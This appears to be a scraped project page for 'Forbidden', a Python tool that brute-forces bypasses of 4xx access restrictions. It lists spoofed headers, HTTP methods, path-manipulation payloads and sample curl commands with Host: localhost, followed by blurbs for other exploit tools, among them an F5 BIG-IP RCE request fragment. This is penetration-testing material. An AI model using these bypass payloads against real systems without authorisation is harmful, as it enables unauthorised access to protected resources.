Bypass 4xx HTTP response status codes.

Overview

Forbidden

Bypass 4xx HTTP response status codes.

To see all the test cases, check the source code - follow the NOTE comments.

Script uses multithreading, and is based on brute forcing so might have some false positives. Script uses colored output.

Extend this script to your liking.

Tested on Kali Linux v2021.4 (64-bit).

Made for educational purposes. I hope it will help!

Future plans:

  • file uploads with HTTP PUT,
  • cross-site tracing (XST),
  • basic authentication.

Table of Contents

How to Run

Open your preferred console from /src/ and run the commands shown below.

Install required packages:

pip3 install -r requirements.txt

Run the script:

python3 forbidden.py

Download a user agent list from here.

Parsed URL Format

To see all the default values used in the script, check the source code - follow the NOTE comments.

{
	"urls": [
		"http://example.com/admin",
		"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ/ᴬᴰᴹᴵᴺ"
	],
	"scheme_domains": [
		"http://example.com",
		"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ"
	],
	"domains": [
		"example.com",
		"ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ"
	],
	"paths": [
		"admin",
		"/admin",
		"admin/",
		"/admin/",
		"ᴬᴰᴹᴵᴺ",
		"/ᴬᴰᴹᴵᴺ",
		"ᴬᴰᴹᴵᴺ/",
		"/ᴬᴰᴹᴵᴺ/"
	],
	"all": [
		"http://example.com/admin",
		"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ/ᴬᴰᴹᴵᴺ",
		"http://example.com",
		"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ",
		"example.com",
		"ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ",
		"admin",
		"/admin",
		"admin/",
		"/admin/",
		"ᴬᴰᴹᴵᴺ",
		"/ᴬᴰᴹᴵᴺ",
		"ᴬᴰᴹᴵᴺ/",
		"/ᴬᴰᴹᴵᴺ/"
	]
}

HTTP Headers

Client-IP
Cluster-Client-IP
Connection
Contact
Forwarded
Forwarded-For
Forwarded-For-Ip
From
Host
Origin
Referer
Stuff
True-Client-IP
X-Client-IP
X-Custom-IP-Authorization
X-Forward
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Server
X-Forward-For
X-Forwared-Host
X-Host
X-HTTP-Host-Override
X-Original-URL
X-Originating-IP
X-Override-URL
X-ProxyUser-IP
X-Real-IP
X-Remote-Addr
X-Remote-IP
X-Rewrite-URL
X-Wap-Profile
X-Server-IP
X-Target

HTTP Methods

ACL
ARBITRARY
BASELINE-CONTROL
BIND
CHECKIN
CHECKOUT
CONNECT
COPY
DELETE
GET
HEAD
INDEX
LABEL
LINK
LOCK
MERGE
MKACTIVITY
MKCALENDAR
MKCOL
MKREDIRECTREF
MKWORKSPACE
MOVE
OPTIONS
ORDERPATCH
PATCH
POST
PRI
PROPFIND
PROPPATCH
PUT
REBIND
REPORT
SEARCH
SHOWMETHOD
SPACEJUMP
TEXTSEARCH
TRACE
TRACK
UNBIND
UNCHECKOUT
UNLINK
UNLOCK
UPDATE
UPDATEREDIRECTREF
VERSION-CONTROL

URL Paths

/
//
/%2e
/%2e/
/.
/./
/..
/../
/;
/;/
/.;
/.;/
/..;
/..;/
%20
%20/
%09
%09/
;foo=bar;
/;foo=bar;
;foo=bar;/
/;foo=bar;/
~
~~
/~randomstring
#
##
/#randomstring
?
??
/?randomstring
/*
/**
/*randomstring
.jsp
.jspa
.jspx
.jhtml
.html
.sht
.shtml
.xhtml
.php
.asp
.aspx
.esp

Results Format

[
	{
		"id": 9,
		"url": "https://example.com/admin",
		"method": "GET",
		"headers": [
			"Host: localhost"
		],
		"agent": null,
		"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: localhost' -X 'GET' 'https://example.com/admin'",
		"code": "302",
		"length": "142"
	},
	{
		"id": 49,
		"url": "https://example.com/admin",
		"method": "GET",
		"headers": [
			"Host: localhost:80"
		],
		"agent": null,
		"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: localhost:80' -X 'GET' 'https://example.com/admin'",
		"code": "302",
		"length": "142"
	},
	{
		"id": 169,
		"url": "https://example.com/admin",
		"method": "GET",
		"headers": [
			"Host: 127.0.0.1"
		],
		"agent": null,
		"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: 127.0.0.1' -X 'GET' 'https://example.com/admin'",
		"code": "302",
		"length": "142"
	},
	{
		"id": 209,
		"url": "https://example.com/admin",
		"method": "GET",
		"headers": [
			"Host: 127.0.0.1:80"
		],
		"agent": null,
		"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: 127.0.0.1:80' -X 'GET' 'https://example.com/admin'",
		"code": "302",
		"length": "142"
	}
]

Images

Help

Figure 1 - Help

You might also like...
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE

CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE. POST /mgmt/tm/util/bash HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3
Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3, It Fuzzes All URLs of target website & then scan them for EAR

HTTP security headers for Flask

Talisman: HTTP security headers for Flask Talisman is a small Flask extension that handles setting HTTP headers that can help protect against a few co

An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

mitmproxy mitmproxy is an interactive, SSL/TLS-capable intercepting proxy with a console interface for HTTP/1, HTTP/2, and WebSockets. mitmdump is the

Set the draft security HTTP header Permissions-Policy (previously Feature-Policy) on your Django app.

django-permissions-policy Set the draft security HTTP header Permissions-Policy (previously Feature-Policy) on your Django app. Requirements Python 3.

CVE-2021-40346 integer overflow enables http smuggling
CVE-2021-40346 integer overflow enables http smuggling

CVE-2021-40346-POC CVE-2021-40346 integer overflow enables http smuggling Reference: https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021

This script checks for any possible SSRF dns/http interactions in xmlrpc.php pingback feature

rpckiller This script checks for any possible SSRF dns/http interactions in xmlrpc.php pingback feature and with that you can further try to escalate

Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.
Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability This is a proof of concept for CVE-2021-31166 ("HTTP Protocol Stack Remote Cod

Releases(v9.1)
  • v9.1(Nov 24, 2022)

    Reintroduced PycURL as it is less prone to exceptions and because Python Requests fixed their double header bug.

    Python tool for brute forcing 4xx response status codes. Based on PycURL.

    Source code(tar.gz)
    Source code(zip)
Owner
Ivan Šincek
Offensive security engineer. These are some of the security related codes I wrote in my free time.
Ivan Šincek
automatically crawl every URL and find cross site scripting (XSS)

scancss Fastest tool to find XSS. scancss is a fastest tool to detect Cross Site scripting (XSS) automatically and it's also an intelligent payload ge

Md. Nur habib 30 Sep 24, 2022
Uncover the full name of a target on Linkedin.

Revealin Uncover the full name of a target on Linkedin. It's just a little PoC exploiting a design flaw. Useful for OSINT. Screenshot Usage $ git clon

mxrch 129 Dec 21, 2022
A python module for retrieving and parsing WHOIS data

pythonwhois A WHOIS retrieval and parsing library for Python. Dependencies None! All you need is the Python standard library. Instructions The manual

Sven Slootweg 384 Dec 23, 2022
CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain device credentials.

CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain device credentials.

EntySec 118 Dec 24, 2022
POC for CVE-2022-1388

CVE-2022-1388 POC for CVE-2022-1388 affecting multiple F5 products. Follow the Horizon3.ai Attack Team on Twitter for the latest security research: Ho

Horizon 3 AI Inc 231 Dec 07, 2022
Aiminsun 165 Dec 21, 2022
PrivateRoom - Make your work private by building a system using arduino which instantly kills a program when someone enters your room/cabin

privateRoom Make your work private by building a system using arduino which instantly kills a program when someone enters your room/cabin STEPS: Uploa

Divyanshu Kumar 3 Nov 08, 2022
SSL / TLS Checking Tool written in Python3

ssts-chk SSL / TLS Checking Tool written in Python3. This tool will perform the following functions: Connect the target given Analyze the secure conne

Douglas Berdeaux 2 Feb 12, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Known issues it will not work outside kali , i will update it

Hossam 867 Dec 22, 2022
A OSINT tool coded in python

Argus Welcome to Argus, a OSINT tool coded in python. Disclaimer I Am not responsible what you do with the information that is given to you by my tool

Aidan 2 Mar 20, 2022
Password-Manager GUI

PASSWORD-MANAGER This repo contains all the project files. Project Description A Tkinter GUI that allows you to store website info like website name,

David .K. Danso 1 Dec 08, 2021
web指纹识别工具

前言 一直苦于没有用的顺手的web指纹识别工具,学习前辈s7ckTeam的Glass和broken5的WebAliveScan优秀开源程序开发的轻量型web指纹工具。

EASY 966 Dec 26, 2022
Advanced subdomain scanner, any domain hidden subdomains

little advanced subdomain scanner made in python, works very quick and has options to change the port u want it to connect for

Nano 5 Nov 23, 2021
Update of uncaptcha2 from 2019

YouTube Video Proof of Concept I created a new YouTube Video with technical Explanation for breaking Google's Audio reCAPTCHAs: Click on the image bel

Nikolai Tschacher 153 Dec 20, 2022
A toolkit for web reconnaissance, it's fast and easy to use.

A toolkit for web reconnaissance, it's fast and easy to use. File Structure httpsuite/ main.py init.py db/ db.py init.py subdomains_db directories_db

whoami security 22 Jul 22, 2022
CVE-2022-22965 : about spring core rce

CVE-2022-22965: Spring-Core-Rce EXP 特性: 漏洞探测(不写入 webshell,简单字符串输出) 自定义写入 webshell 文件名称及路径 不会追加写入到同一文件中,每次检测写入到不同名称 webshell 文件 支持写入 冰蝎 webshell 代理支持,可

东方有鱼名为咸 53 Nov 09, 2022
A small Python Script To get all levels of subdomains from a list

getlevels A small Python Script To get all levels of subdomains Easily get 1st level, 2nd level, 3rd level, 4th level .... nth level subdomains Usag

9 Feb 15, 2022
HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17. Detail HTTP

赛欧思网络安全研究实验室 365 Nov 30, 2022
RapiDAST provides a framework for continuous, proactive and fully automated dynamic scanning against web apps/API.

RapiDAST RapiDAST provides a framework for continuous, proactive and fully automated dynamic scanning against web apps/API. Its core engine is OWASP Z

Red Hat Product Security 17 Nov 11, 2022